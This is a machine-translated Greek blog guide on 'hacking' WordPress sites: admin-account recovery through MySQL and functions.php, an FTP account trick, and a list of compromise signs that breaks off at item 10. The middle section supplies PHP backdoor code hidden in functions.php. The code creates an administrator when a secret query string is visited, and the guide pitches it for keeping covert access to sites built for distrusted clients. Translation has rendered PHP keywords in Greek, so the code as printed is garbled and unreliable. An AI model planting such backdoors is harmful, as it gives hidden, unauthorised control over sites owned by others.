Πώς να κάνετε hack σε έναν ιστότοπο WordPress, ο πλήρης οδηγός

Πώς να κάνετε hack σε έναν ιστότοπο WordPress, τον πλήρη οδηγό


Δεν συγχωρούμε, εγκρίνουμε ούτε ενθαρρύνουμε οποιαδήποτε παράνομη ή κακόβουλη συμπεριφορά! Ο σκοπός αυτού του άρθρου είναι να εξηγήσει πώς να κάνετε hack ή να αποκτήσετε ξανά πρόσβαση σε έναν ιστότοπο WordPress που σας ανήκει ή ότι έχετε δικαιώματα επεξεργασίας, διαχείρισης και πρόσβασης. Ό, τι κι αν κάνετε, το κάνετε μόνοι σας. Δεν είμαστε υπεύθυνοι για τις ενέργειές σας. Αυτός ο οδηγός εξυπηρετεί μόνο για εκπαιδευτικούς σκοπούς.

Οι περιγραφόμενες μέθοδοι θα σας βοηθήσουν να ανακτήσετε την πρόσβαση στον ιστότοπο, ακόμη και αν δεν έχετε πλέον λογαριασμό, αλλά θα απαιτήσετε κάποιες πληροφορίες σχετικά με τον ιστότοπο και δεν θα σας βοηθήσουν να κάνετε hack σε οποιαδήποτε τυχαία εγκατάσταση WordPress.

Σε αυτόν τον οδηγό, πρόκειται να σας δείξουμε:

  • Πώς να κάνετε hack σε έναν ιστότοπο WordPress
  • Πώς να δημιουργήσετε ένα backdoor στο WordPress
  • Πώς να δημιουργήσετε έναν νέο λογαριασμό χρήστη μέσω FTP
  • 10 σημάδια ότι ο ιστότοπός σας στο WordPress έχει παραβιαστεί

Contents

Πώς να κάνετε hack σε έναν ιστότοπο WordPress, τον πλήρη οδηγό

Καταστάσεις στις οποίες μπορείτε να βοηθήσετε τον εαυτό σας

Εάν βρίσκεστε σε μία από τις ακόλουθες καταστάσεις, οι μέθοδοι μας θα σας βοηθήσουν να αποκτήσετε ξανά πρόσβαση:

  • ξεχάσατε το όνομα χρήστη ή τη διεύθυνση email
  • Η επιλογή επαναφοράς κωδικού πρόσβασης δεν λειτουργεί στον διακομιστή φιλοξενίας
  • επαναφορά κωδικού πρόσβασης επαναφοράς
  • δεν έχετε πλέον πρόσβαση στη διεύθυνση email του λογαριασμού
  • γνωρίζετε το όνομα χρήστη και τον κωδικό πρόσβασης, αλλά ο συνδυασμός δεν λειτουργεί

Για να χρησιμοποιήσετε τις μεθόδους που περιγράφονται παρακάτω, θα χρειαστείτε μόνο ένα από τα ακόλουθα:

  • Πρόσβαση FTP στον διακομιστή ή
  • cPanel πρόσβαση στο διακομιστή, ή
  • πρόσβαση στη βάση δεδομένων MySQL και τη δυνατότητα σύνδεσης σε αυτήν από απόσταση

Μέθοδος # 1 – ο τρόπος MySQL

Χρησιμοποιήστε αυτήν τη μέθοδο για να αλλάξετε τον κωδικό πρόσβασης (ή το όνομα χρήστη εάν απαιτείται) ενός υπάρχοντος χρήστη ή για να δημιουργήσετε έναν νέο λογαριασμό. Θα χρειαστείτε πρόσβαση στο cPanel ή να κατευθύνετε την πρόσβαση MySQL στη βάση δεδομένων του ιστότοπου. Ας ξεκινήσουμε αλλάζοντας τον κωδικό πρόσβασης ενός υπάρχοντος χρήστη.

Εάν χρησιμοποιείτε το cPanel, μπορείτε να έχετε πρόσβαση στο cPanel μέσω του https://yoursite.com:2083 link), εντοπίστε και ανοίξτε το phpMyAdmin. Η λίστα των βάσεων δεδομένων και των πινάκων βρίσκεται στα αριστερά. Ψάχνετε για τον πίνακα που τελειώνει _ χρήστες. Πιθανότατα θα είναι wp_users, αλλά εάν έχετε εγκαταστήσει περισσότερους από έναν ιστότοπους WordPress στον διακομιστή, πρέπει να βρείτε τον σωστό.

Ο σωστός πίνακας θα έχει τον χρήστη που θέλετε να επεξεργαστείτε σε αυτόν. Ακολουθήστε την ίδια διαδικασία εάν συνδέεστε στο MySQL μέσω κάποιου εξωτερικού πελάτη όπως SQLyog. Μόλις εντοπίσετε τον πίνακα και την πραγματική εγγραφή χρήστη, ήρθε η ώρα να αλλάξετε τον κωδικό πρόσβασης.

Όπως πιθανώς έχετε καταλάβει, ο κωδικός πρόσβασης αποθηκεύεται στο user_pass πεδίο, κατακερματισμός χρησιμοποιώντας τον αλγόριθμο MD5. Ανοιξε το ηλεκτρονική γεννήτρια MD5 εισαγάγετε τον κωδικό πρόσβασης που θέλετε να χρησιμοποιήσετε και κάντε κλικ στο “Hash”. Αντιγράψτε τη δημιουργημένη συμβολοσειρά και αντικαταστήστε τον αρχικό κωδικό πρόσβασης Με αυτό. Στο phpMyAdmin, μπορείτε να επεξεργαστείτε το πεδίο κάνοντας διπλό κλικ πάνω του. Η διαδικασία είναι παρόμοια σε άλλους πελάτες MySQL. Αποθηκεύστε τις αλλαγές και συνδεθείτε στο WordPress με τον νέο σας κωδικό πρόσβασης.

Πίνακας χρηστών WP

Τα ονόματα χρήστη, οι κατακερματισμένοι κωδικοί πρόσβασης και τα email αποθηκεύονται στο wp_users πίνακας βάσης δεδομένων

Ακόμα στη μέθοδο # 1 – δημιουργία νέου χρήστη

Η δημιουργία ενός νέου χρήστη είναι λίγο πιο περίπλοκη, αλλά εξακολουθεί να διαχειρίζεται σε λιγότερο από ένα λεπτό. Δημιουργήστε μια νέα εγγραφή στον πίνακα χρηστών και συμπληρώστε: user_login, user_pass (hashed, χρησιμοποιώντας τη συνάρτηση MD5 που περιγράφεται παραπάνω) και user_email. Όλα τα άλλα πεδία μπορούν να παραμείνουν κενά. δεν έχουν σημασία. Αποθηκεύστε τη νέα εγγραφή. Μόλις αποθηκευτεί, η MySQL θα του δώσει ένα μοναδικό αναγνωριστικό. Είναι ο αριθμός στο πεδίο Αναγνωριστικό. Θυμήσου το.

Τώρα πηγαίνετε στο _usermeta τραπέζι. Θυμάμαι, το πρόθεμα του πίνακα πρέπει να είναι το ίδιο με αυτό του χρήστη. Για παράδειγμα wp_users και wp_usersmeta. Εάν το πρόθεμα δεν είναι το ίδιο, επεξεργάζεστε λάθος πίνακα (για κάποια άλλη εγκατάσταση WP) και ο νέος λογαριασμός δεν θα λειτουργήσει. Θα δημιουργήσουμε δύο νέους δίσκους. Αγνοήστε το umeta_id πεδίο και για τους δύο. Σειρά ταυτότητα χρήστη πεδίο στην τιμή που μόλις θυμηθήκατε (η νέα τιμή αναγνωριστικού στον πίνακα χρηστών). Για το πρώτο σετ δίσκων μετα-κλειδί προς την wpct_user_level και μετα-τιμή προς την 10. Για το δεύτερο μετα-κλειδί προς την wpct_capabilities και μετα-τιμή προς την a: 1: {s: 13: "διαχειριστής"; b: 1;}. Αποθηκεύστε και τα δύο. Τελειώσατε – συνδεθείτε!

Μέθοδος # 2 – ο τρόπος functions.php

Αυτή η προσέγγιση μπορεί να χρησιμοποιηθεί είτε με την επεξεργασία του functions.php μέσω του cPanel είτε με τη χρήση ενός προγράμματος-πελάτη FTP για να το κάνει. Εάν χρησιμοποιείτε το cPanel βρείτε το File Manager και ανοίξτε το. Πρώτον, πρέπει να βρούμε το φάκελο του ενεργού θέματος.

Παω σε public_html / wp_content / θέματα ντοσιέ. Εάν δείτε αμέσως το θέμα σας και ξέρετε ποιο είναι – υπέροχο. Ανοίξτε το φάκελο και ξεκινήστε την επεξεργασία functions.php. Εάν όχι, ανοίξτε τον ιστότοπο, κάντε δεξί κλικ οπουδήποτε, επιλέξτε “Προβολή πηγής”. Στη συνέχεια, πατήστε Ctrl + F και ξεκινήστε να πληκτρολογείτε / θέματα / σύντομα θα επισημάνετε πολλές διευθύνσεις URL και θα αναγνωρίσετε το όνομα του φακέλου του ενεργού θέματος.

Βρείτε το στη δομή αρχείων, ανοίξτε και ξεκινήστε την επεξεργασία functions.php. Αντιγράψτε / επικολλήστε τον ακόλουθο κώδικα στο τέλος του αρχείου. Προσοχή στο κλείσιμο ?> Ετικέτες PHP εάν τις έχετε. Πρέπει να είναι στην τελευταία γραμμή. Εισάγετε λοιπόν τον κωδικό πριν από αυτούς.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

εάν (! username_exists ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (πίνακας ('ID' => $ user_id, 'nickname' => $ new_user_email));

$ user = νέο WP_User ($ user_id);
$ user-> set_role ('διαχειριστής');
}

Επεξεργαστείτε μόνο τις δύο πρώτες γραμμές του κώδικα για να αντικατοπτρίζει τον νέο σας λογαριασμό. Εάν υπάρχει ήδη χρήστης στο WP με αυτό το μήνυμα ηλεκτρονικού ταχυδρομείου, δεν θα δημιουργηθεί νέος λογαριασμός, οπότε βεβαιωθείτε ότι είναι νέος. Αλλάξτε επίσης τον κωδικό πρόσβασης – μην παραβιάζεστε από παιδικά σενάρια. Αφού αποθηκεύσετε το αρχείο, απλώς ανοίξτε τον ιστότοπό σας, θα εκτελεστεί ο κωδικός, θα δημιουργηθεί ένας νέος λογαριασμός με δικαιώματα διαχειριστή και θα μπορείτε να συνδεθείτε μαζί του.

Αφού το κάνετε, θυμηθείτε να διαγράψετε τον κωδικό από functions.php.

Άλλες μέθοδοι πειρατείας

Γνωρίζοντας τον κωδικό πρόσβασης FTP, cPanel ή MySQL, αποδεικνύετε ότι έχετε νόμιμη πρόσβαση στο διακομιστή και ως εκ τούτου θα πρέπει να έχετε πρόσβαση και στις εγκαταστάσεις του WordPress. Εάν δεν έχετε κανέναν από αυτούς τους λογαριασμούς, τότε δεν έχετε κανένα καλό (εισβολή σε ιστότοπους άλλων ατόμων) και αυτό δεν είναι ωραίο!

Να θυμάστε ότι η απόκτηση μη εξουσιοδοτημένης πρόσβασης σε υπολογιστές, ιστότοπους ή διακομιστές είναι σοβαρό έγκλημα και αντιμετωπίζεται αμέσως στις περισσότερες χώρες.

Εάν φοβάστε ότι μπορεί να παραβιαστεί ο ιστότοπός σας στο WordPress, ελέγξτε αυτήν τη σελίδα με δωρεάν σαρωτή ασφαλείας WordPress. Εάν δεν έχετε χρόνο να δημιουργήσετε το ιστολόγιό σας, ας το κάνουμε για εσάς.

Πώς να δημιουργήσετε ένα backdoor στο WordPress

Όταν η μπροστινή πόρτα είναι κλειστή, μπορείτε να δοκιμάσετε την πίσω πόρτα. Αυτό μπορεί να ακούγεται σαν κακόβουλος τρόπος χρήσης του κωδικού για την είσοδο στον ιστότοπο χωρίς να έχει πρόσβαση σε αυτόν, αλλά στην πραγματικότητα υπάρχουν στιγμές που πρέπει να ελέγξετε τον δικό σας ιστότοπο εάν κάποιος τον έκλεψε.

Εάν δημιουργεί ιστότοπους για άλλους ανθρώπους κάτι που κάνετε, αργά ή γρήγορα θα υπάρχει ένας πελάτης που θα αρνηθεί να σας πληρώσει για την εργασία σας. έναν πελάτη που θα διαγράψει τα στοιχεία σύνδεσής σας και θα αναλάβει τον έλεγχο όλων όσων έχετε κάνει. Μερικές φορές, αρκεί να δημιουργήσετε έναν νέο χρήστη μέσω FTP ή να επαναφέρετε έναν κωδικό πρόσβασης. Όταν αυτό δεν είναι αρκετό, ίσως θελήσετε να χαράξετε το δρόμο σας πίσω ή να δημιουργήσετε πρόσβαση πίσω πόρτας στις σελίδες διαχειριστή σας.

Αλλά εάν αποφασίσατε να αποκρύψετε ένα μικρό κομμάτι κώδικα στο περιβάλλον του WordPress, ίσως σώσετε κάποια αξιοπρέπεια και αποκτήστε πρόσβαση στον ιστότοπο του WordPress με δικαιώματα διαχειριστή. Και από εκεί ξεκινούν τα παιχνίδια.

Ανεξάρτητα από το πόσες φορές αυτός ο κλέφτης διαγράφει τις πληροφορίες σας ή επαναφέρει ένα αντίγραφο ασφαλείας σε έναν διακομιστή που πιθανότατα κατέχει, υπάρχει πιθανότητα να μην γνωρίζει τίποτα για τις εισόδους πίσω πόρτας. Αν το έκανε, μάλλον δεν θα χρειαζόταν καν τη βοήθειά σας για τη δημιουργία του WordPress, σωστά?

Δημιουργήστε μια πίσω πόρτα:

Εντάξει, αρκετά με τη συζήτηση. Ακολουθεί ένα κομμάτι κώδικα που θα χρειαστεί να ολοκληρώσετε τη δουλειά:

  1. Ανοίξτε το αρχείο functions.php
  2. Αντιγραφή / Επικόλληση παρακάτω κωδικού:
  3. add_action ('wp_head', 'wploop_backdoor');
    συνάρτηση wploop_backdoor () {
    Εάν ($ _GET ['backdoor'] == 'knockknock') {
    απαιτείται ('wp-include / registration.php');
    Εάν (! Username_exists ('username')) {
    $ user_id = wp_create_user ('name', 'pass');
    $ user = νέο WP_User ($ user_id);
    $ user-> set_role ('διαχειριστής');
    }
    }
    }
    ?>
  4. Αποθήκευσε τις αλλαγές

Εάν αφήσετε τον κωδικό όπως είναι, το μόνο που πρέπει να κάνετε για να δημιουργήσετε έναν νέο διαχειριστή στον ιστότοπο είναι η επίσκεψη http://www.yourdomain.com/?backdoor=knockknock

Μετά τη φόρτωση της σελίδας, το νέο όνομα χρήστη σας είναι “όνομα” και κωδικό πρόσβασης “πέρασμα”.

Φυσικά, μπορείτε να το αλλάξετε στον κώδικα παραπάνω αλλάζοντας «όνομα» και «πάσο» σε ό, τι θέλετε. Μπορείτε επίσης να αλλάξετε τον σύνδεσμο προς την πίσω πόρτα σας αλλάζοντας το «backdoor» και / ή το «knockknock» σε οτιδήποτε έρθετε.

Δοκιμάστε τη λειτουργία – όχι μόνο είναι διασκεδαστικό, αλλά μπορεί πραγματικά να σας βοηθήσει κάποια στιγμή στο μέλλον, όταν πρόκειται να δημιουργήσετε έναν ιστότοπο για κάποιον που δεν μπορείτε να εμπιστευτείτε πλήρως. Θα πρέπει επίσης να βελτιώσετε τις δεξιότητές σας στο WordPress και το blogging.

Πώς να δημιουργήσετε έναν νέο λογαριασμό χρήστη μέσω FTP

Η δημιουργία νέων λογαριασμών χρηστών στο WordPress είναι πολύ εύκολη. Ως διαχειριστής, πρέπει να το κάνετε μεταβείτε στη σελίδα διαχειριστή χρηστών όπου μπορείτε να δημιουργήσετε έναν νέο λογαριασμό για οποιονδήποτε ρόλο χρήστη. Αυτό μπορεί να γίνει μέσα σε λίγα δευτερόλεπτα και ένας νεοδημιουργημένος χρήστης μπορεί αμέσως να συνδεθεί με δεδομένο όνομα χρήστη και κωδικό πρόσβασης.

Τι συμβαίνει όμως εάν χάσετε την πρόσβαση στον διαχειριστή του WordPress; Τα πράγματα μπορεί να είναι λίγο πιο περίπλοκα, αλλά μην ανησυχείτε – έχουμε μια λειτουργία για εσάς που μπορεί να σώσει τη ζωή του διαχειριστή σας.

Εάν κάποιος άλλος διαχειριστής διέγραψε τον λογαριασμό σας, αν έχετε διαγράψει κατά λάθος όλους τους χρήστες από τη βάση δεδομένων, έχετε χρησιμοποιήσει μια προσθήκη που δεν λειτουργεί ή έχετε παραβιαστεί, μπορείτε να συνεχίσετε να ελέγχετε ξανά Μερικές φορές μπορεί να έχετε πρόσβαση μόνο στον διακομιστή FTP, ενώ ο HTTP δεν θα είναι διαθέσιμος και θα πρέπει να δημιουργήσετε έναν νέο διαχειριστή. Αν και αυτό μπορεί να είναι μια σπάνια περίπτωση, η ακόλουθη λειτουργία θα σας σώσει.

Για να δημιουργήσετε έναν νέο λογαριασμό εκτός περιβάλλοντος διαχειριστή WordPress, Το μόνο που θα χρειαστείτε είναι μια πρόσβαση FTP στον ιστότοπό σας. Ως διαχειριστής, θα πρέπει να έχετε όλες τις απαραίτητες πληροφορίες για να συνδεθείτε στον διακομιστή σας και μπορείτε να δημιουργήσετε γρήγορα έναν νέο λογαριασμό δημιουργώντας μια νέα λειτουργία στο θέμα σας.

Δημιουργήστε έναν νέο λογαριασμό χρήστη μέσω FTP:

  1. Ανοίξτε το πρόγραμμα-πελάτη FTP και συνδεθείτε στον λογαριασμό σας
  2. Μεταβείτε στο wp-content / θέματα
  3. Ανοίξτε το φάκελο του θέματος που χρησιμοποιείτε
  4. Αναζητήστε το αρχείο functions.php και επεξεργαστείτε το
  5. Αντιγράψτε και επικολλήστε την ακόλουθη λειτουργία:
  6. συνάρτηση admin_account () {
    $ user = 'Όνομα χρήστη';
    $ pass = 'Κωδικός πρόσβασης';
    $ email = '[email protected]';
    εάν (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ user = νέο WP_User ($ user_id);
    $ user-> set_role ('διαχειριστής');
    }}
    add_action ('init', 'admin_account');
    
  7. Αλλάξτε το όνομα χρήστη, τον κωδικό πρόσβασης και το email σε κάτι μοναδικό
  8. Αποθήκευσε τις αλλαγές

Βεβαιωθείτε ότι το όνομα χρήστη, ο κωδικός πρόσβασης και η διεύθυνση email που έχετε ορίσει στη λειτουργία είναι μοναδικά αλλιώς η λειτουργία δεν θα λειτουργήσει σωστά. Μόλις αποθηκεύσετε τις αλλαγές, τελειώσετε και μπορείτε να πλοηγηθείτε στον πίνακα σύνδεσης WP. Χρησιμοποιήστε νέες πληροφορίες για να συνδεθείτε ξανά και αφού επαληθεύσετε τον λογαριασμό, μπορείτε να διαγράψετε τη συνάρτηση από το αρχείο functions.php.

Η παραπάνω λειτουργία δημιουργεί έναν λογαριασμό διαχειριστή, αλλά μπορείτε εύκολα να τον τροποποιήσετε για να δημιουργήσετε έναν λογαριασμό με οποιονδήποτε άλλο ρόλο χρήστη. Απλά αλλάξτε το ρόλο στο 8ου σειρά του κώδικα στον συντάκτη, τον συντάκτη, τον συνεισφέροντα, τον συνδρομητή ή οποιονδήποτε άλλο ρόλο χρήστη που έχετε δημιουργήσει.

Δυστυχώς, εάν έχετε χάσει τον λογαριασμό διαχειριστή σας, έχετε επίσης χάσει όλες τις αναρτήσεις που γράφονται με αυτό το όνομα χρήστη. Γι ‘αυτό πρέπει πάντα να διατηρείτε ένα αντίγραφο ασφαλείας το οποίο μπορείτε εύκολα να ανακτήσετε. Εάν το διαβάζετε ενώ έχετε τον λογαριασμό διαχειριστή σας, Πάρτε αυτό ως υπενθύμιση για να δημιουργήσετε ένα αντίγραφο ασφαλείας αμέσως και προσθέστε σελιδοδείκτη σε αυτό το άρθρο σε περίπτωση που χρειαστεί να δημιουργήσετε έναν λογαριασμό εκτός WordPress στο μέλλον.

10 σημάδια ότι ο ιστότοπός σας στο WordPress έχει παραβιαστεί

Το WordPress είναι μια τεράστια πλατφόρμα blogging. Υπάρχουν εκατομμύρια χρήστες και φαίνεται ότι ο αριθμός αυξάνεται γρήγορα κάθε μέρα. Οι άνθρωποι τείνουν ακόμη και να μεταφέρουν τους ιστότοπούς τους που έχουν δημιουργηθεί σε άλλα συστήματα διαχείρισης περιεχομένου σε αυτό το σύστημα ανοιχτού κώδικα πιο συχνά από ό, τι νομίζετε. Και, ενώ αυτό είναι καλό, αυτό σημαίνει ότι Οι χάκερ θα βάλουν επίσης το WordPress σε ένα νούμερο ένα σημείο όταν προσπαθούν να εισβάλουν σε τυχαίους ιστότοπους.

Συνήθως, εάν χακαριστείτε, θα το γνωρίζετε αμέσως. Ο ιστότοπός σας θα γίνει απρόσιτος. δεν θα μπορείτε να συνδεθείτε και μερικές φορές ένας εισβολέας θα αφήσει ακόμη και ένα μήνυμα στην πρώτη σελίδα. Αλλά πιο συχνά από ό, τι όχι, ίσως να μην παρατηρήσετε ότι κάτι έχει αλλάξει. Σε αυτό το μέρος του άρθρου, πρόκειται να σας δείξουμε πολλά σημάδια που μπορεί να σας δείξουν ότι ο ιστότοπός σας στο WordPress παραβιάστηκε και μερικές λύσεις στο πρόβλημα.

1. Ανεπιτυχής σύνδεση

Αυτό το σημάδι είναι αρκετά εμφανές. Εάν έχετε χρησιμοποιήσει συνδυασμό ονόματος χρήστη και κωδικού πρόσβασης για λίγο χωρίς να έχετε προβλήματα, μπορεί να υποψιαστείτε εάν ξαφνικά το WordPress δεν αναγνωρίσει τον λογαριασμό σας. Εάν ένας χάκερ έπρεπε να συνδεθεί στον ιστότοπό σας, οι πιθανότητες είναι ότι θα αλλάξει γρήγορα τα δικαιώματα διαχειριστή σας.

Ίσως πρέπει να αλλάξει τον κωδικό πρόσβασής σας ή να διαγράψει εντελώς τον λογαριασμό σας. Προτού αρχίσετε να πανικοβληθείτε μετά την πρώτη φορά που το WordPress σας στέλνει μηνύματα σχετικά με εσφαλμένο όνομα χρήστη / κωδικό πρόσβασης, λάβετε υπόψη το γεγονός ότι ενδέχεται να έχετε εισαγάγει λάθος συνδυασμό ή ότι ενδέχεται να έχετε ενεργοποιήσει το κουμπί κλειδώματος κεφαλαίων.

Λύση: Δοκιμάστε να ανακτήσετε τον κωδικό πρόσβασης μέσω email ή χρησιμοποιήστε έναν άλλο λογαριασμό για να συνδεθείτε ξανά. Για να βεβαιωθείτε ότι η σύνδεσή σας παραμένει ασφαλής, σας συνιστούμε να εγκαταστήσετε Σύνδεση Ninja plugin για WordPress.

2. Προστίθεται κακόβουλο περιεχόμενο στον ιστότοπό σας

Ο ιστότοπος περιέχει προειδοποίηση για κακόβουλο λογισμικό

Εάν αρχίσετε να παρατηρείτε άγνωστο περιεχόμενο στον ιστότοπό σας, ίσως αρχίσετε να ανησυχείτε. Όταν έχουν την ευκαιρία να αποκτήσουν πρόσβαση στην περιοχή διαχειριστή σας, Οι εισβολείς θα μπορούν να αλλάξουν τον πυρήνα σας και τα αρχεία θεμάτων και προσθηκών σας. Αυτό σημαίνει ότι μπορούν να αλλάξουν οτιδήποτε θέλουν.

Ενώ ορισμένοι χάκερ θα τροποποιήσουν δραστικά την εμφάνιση του ιστότοπού σας και ίσως μάλιστα εξηγούν ότι έχετε παραβιαστεί, οι άλλοι θα είναι πολύ πιο διακριτικοί σχετικά με αυτό.

Λύση: Δοκιμάστε να αναζητήσετε κρυφό περιεχόμενο στον κώδικα ιστότοπου. Ενδέχεται να υπάρχουν σύνδεσμοι για κακόβουλους ιστότοπους που εισέρχονται hacker στο υποσέλιδο του ιστότοπού σας ή ενδέχεται να έχουν εγκαταστήσει αναδυόμενα παράθυρα που θα ανοίγουν τακτικά στους πελάτες σας. Χρησιμοποιήστε το Security Ninja για να σαρώσετε τον ιστότοπό σας ή να παρακολουθείτε συνεχώς τον ιστότοπό σας για τέτοια προβλήματα.

3. Ύποπτες επισκέψεις

Εάν δεν παρακολουθείτε τον ιστότοπό σας, θα πρέπει να ξεκινήσετε αμέσως. Ένας απλός τρόπος είναι να χρησιμοποιήσετε το Google Analytics το οποίο, μεταξύ πολλών άλλων λειτουργιών, μπορεί να σας πει πόσες επισκέψεις λαμβάνετε και από πού προέρχονται αυτές οι επισκέψεις. Μετά από λίγο καιρό, θα γνωρίσετε τον ιστότοπό σας. Αυτό σημαίνει ότι θα γνωρίζετε από πού προέρχονται οι επισκέψεις, θα ξέρετε πότε ξεκινάτε μια νέα καμπάνια και πότε υπάρχουν νέοι σύνδεσμοι προώθησης που κυκλοφορούν στην άγρια ​​φύση.

Αν όμως ξαφνικά παρατηρήσετε ότι ο ιστότοπός σας λαμβάνει τεράστιο αριθμό νέων επισκέψεων από τον ύποπτο τομέα, θα θελήσετε να το διερευνήσετε περαιτέρω επειδή ο ιστότοπός σας ενδέχεται να παραβιαστεί. Συνήθως, αυτού του είδους οι επισκέψεις θα οδηγήσουν σε ποσοστό εγκατάλειψης 100%, πράγμα που σημαίνει ότι μόνο μία σελίδα είχε πρόσβαση. Οι χάκερ συχνά χρησιμοποιούν αυτοματοποιημένα συστήματα που θα οδηγούν άλλους κακούς ιστότοπους στα δικά σας. Είτε πρόκειται για τον κακό κώδικα που εκτελείται στον ιστότοπό σας είτε έχετε γίνει μέρος ενός spamming δικτύου, τα πράγματα μπορεί να γίνουν σοβαρά και θα πρέπει να ελέγξετε τον ιστότοπό σας για κακόβουλο κώδικα.

Λύση: Χρήση Εργαλεία για Webmasters Google για να βρείτε ύποπτους τομείς

4. Ξαφνική πτώση της κυκλοφορίας

Ασφαλής περιήγηση Κατάσταση ιστότοπου

Σε αντίθεση με το τελευταίο σημάδι της παραβίασης, αυτό μπορεί να σας ειδοποιήσει επειδή υπάρχει ξαφνικά μείωση του αριθμού των επισκέψεων. Αντί να αναφέρετε νέες επισκέψεις σε εσάς, ένας εισβολέας ενδέχεται να στείλει επισκέψεις μακριά από τον ιστότοπό σας. Αυτό μπορεί να συμβεί επειδή ένας εισβολέας ανακατευθύνθηκε στον ιστότοπό σας σε άλλο. Ο άλλος λόγος για να προσελκύσετε λιγότερους επισκέπτες είναι ότι η Google έβγαλε μαύρη λίστα στον ιστότοπό σας. Αυτή η ενέργεια θα εμφανίσει ένα μήνυμα σε κάθε χρήστη που μπορεί να επιλέξει να μην ανοίξει τον ιστότοπό σας επειδή έχει μολυνθεί.

Λύση: Χρησιμοποιήστε το Google Κατάσταση ιστότοπου ασφαλούς περιήγησης για να ελέγξετε εάν ο ιστότοπός σας έχει επισημανθεί ως μη ασφαλής και προς το παρόν είναι επικίνδυνο να το επισκεφτείτε.

5. Τα αποτελέσματα της μηχανής αναζήτησης είναι παράξενα

Εάν δεν έχετε παρατηρήσει αλλαγές στον ιστότοπό σας, αλλά ανακαλύπτετε ότι τα αποτελέσματα αναζήτησης στο Google και σε άλλες μηχανές αναζήτησης είναι παράξενα (εμφανίστε διαφορετικούς τίτλους και άλλα μετα-δεδομένα), αυτό μπορεί να είναι ένα σαφές σημάδι ενός παραβιασμένου ιστότοπου. Ένας χάκερ μπορεί να έχει αλλάξει το περιεχόμενό σας με τρόπο που να είναι ορατός μόνο σε έναν ειδικό. Ωστόσο, η αλλαγή θα ήταν ορατή στα αποτελέσματα της μηχανής αναζήτησης.

Λύση: Ελέγξτε τον ιστότοπό σας με Εργαλεία για Webmasters Google, και ελέγξτε αν ο ιστότοπός σας παραβιάστηκε με αυτό δωρεάν διαδικτυακό εργαλείο.

6. Δεν μπορείτε να στείλετε / λάβετε email

Μόλις ένας χάκερ αποκτήσει πρόσβαση στον ιστότοπό σας, πιθανότατα θα το θέλει χρησιμοποιήστε τον διακομιστή σας για αποστολή ανεπιθύμητων μηνυμάτων σε όλους τους άλλους. Όταν ανακαλύψετε ότι δεν μπορείτε να στείλετε ή να λάβετε νέα μηνύματα ηλεκτρονικού ταχυδρομείου από το WordPress, αυτό μπορεί να είναι ένα σαφές σημάδι ότι έχετε παραβιαστεί. Ελέγξτε ξανά το email σας και, στη συνέχεια, επικοινωνήστε με τον πάροχό σας για να βεβαιωθείτε ότι δεν υπάρχουν σφάλματα.

Λύση: Δοκιμάστε το WordPress σας λειτουργία αλληλογραφίας με αυτό το δωρεάν πρόσθετο.

7. Ο ιστότοπος δεν υπάρχει

Ο διακομιστής δεν βρέθηκε

Υπάρχουν φορές που οι εισβολείς δεν θα έχουν πρόσβαση στον ιστότοπό σας για να εγκαταστήσουν κακόβουλο κώδικα, να ανακατευθύνουν τους χρήστες ή να χρησιμοποιήσουν το email σας για ανεπιθύμητο περιεχόμενο. Ωρες ωρες, το μόνο που θέλουν να κάνουν είναι να καταστρέψουν τον ιστότοπό σας. Σπάνια, ένας εισβολέας θα διαγράψει με επιτυχία τα πάντα από ολόκληρο τον διακομιστή. Αυτός είναι ο λόγος για τον οποίο είναι σημαντικό να φιλοξενείτε τα αρχεία σας σε μια διάσημη εταιρεία φιλοξενίας, η οποία θα διασφαλίζει την ασφάλεια και θα διατηρεί επίσης καθημερινά ή τουλάχιστον εβδομαδιαία αντίγραφα ασφαλείας του ιστότοπού σας. Είναι καλή πρακτική να κάνετε τα δικά σας αντίγραφα ασφαλείας κατά καιρούς, έτσι ώστε ο ιστότοπος να μπορεί να αποκατασταθεί γρήγορα.

Λύση: Εγκαταστήστε ένα από τα καλύτερα πρόσθετα για διαχείριση αντιγράφων ασφαλείας στο WordPress.

8. Ύποπτα αρχεία

Παρόμοιο με κακόβουλο περιεχόμενο που μπορεί να προστεθεί σε υπάρχοντα αρχεία, ένας εισβολέας μπορεί να τοποθετήσει επιπλέον αρχεία οπουδήποτε μέσα στον ριζικό σας φάκελο. Είναι καλό να γνωρίζετε το δρόμο σας γύρω από το WordPress, αλλά αν δεν είστε τόσο έμπειροι, θα πρέπει να έχετε στη διάθεσή σας ένα εργαλείο ασφαλείας που να μπορεί να ελέγχει όλα τα αρχεία και τις δραστηριότητές σας. Πρόσφατα, εξετάσαμε το Ninja ασφαλείας που είναι ένα τέλειο εργαλείο για τον έλεγχο όλων των αρχείων WordPress.

Λύση: Δοκιμάστε να αναζητήσετε αρχεία που δεν ανήκουν στην εγκατάσταση του WordPress. Χρησιμοποιήστε το Security Ninja για σάρωση του ιστότοπού σας σε τακτική βάση και εύρεση αυτών των αρχείων αυτόματα. Στη συνέχεια, διαγράψτε τα αρχεία ή αφαιρέστε τον κακόβουλο κώδικα από μολυσμένα αρχεία. Μην ξεχάσετε το πρόσθετο Core Scanner για το Security Ninja.

9. Νέα μέλη

Ανάλογα με τον ιστότοπό σας, ενδέχεται να είστε ο μόνος που θα μπορεί να προσθέσει νέα μέλη. Σε αυτήν την περίπτωση, ένα μήνυμα ηλεκτρονικού ταχυδρομείου που σας ενημερώνει σχετικά με τους νέους εγγεγραμμένους χρήστες ενδέχεται να προκαλέσει συναγερμό. Εάν υπάρχουν άλλοι διαχειριστές που έχουν τη δυνατότητα να προσθέσουν νέα μέλη, επικοινωνήστε μαζί τους για ύποπτη δραστηριότητα.

Λύση: Αλλάξτε τη διεύθυνση URL σύνδεσης με ένα δωρεάν πρόσθετο, περιορίστε την πρόσβαση στη σελίδα σύνδεσης στο WordPress χρησιμοποιώντας το αρχείο .htpasswd και χρησιμοποιήστε το Login Ninja για να προστατεύσετε τη φόρμα σύνδεσής σας όλη την ώρα.

10. Δείτε τα προγραμματισμένα συμβάντα στον διακομιστή σας

